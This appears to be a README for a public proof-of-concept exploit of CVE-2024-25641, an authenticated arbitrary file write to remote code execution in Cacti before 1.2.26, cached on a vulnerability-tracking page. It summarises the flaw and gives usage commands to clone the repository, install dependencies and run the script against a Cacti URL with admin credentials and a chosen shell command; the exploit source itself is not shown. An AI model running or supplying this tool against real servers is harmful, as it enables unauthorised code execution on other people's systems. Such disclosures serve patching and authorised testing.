Fully automated PoC - CVE-2024-25641 - RCE - Cacti < v1.2.26 🌵
# CVE-2024-25641 - Cacti 1.2.26 - Arbitrary file write to RCE 🌵
- [x] `Authenticated RCE`
- [x] `Cacti version < v1.2.26`
## Summary
___
An arbitrary file write vulnerability, exploitable through the "Package Import" feature, allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server (RCE).
## Proof Of Concept
___

## Usage
___
```
git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26
pip install -r requirements.txt
python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
```
### With poetry
```
git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26
poetry install
poetry run python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
```
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view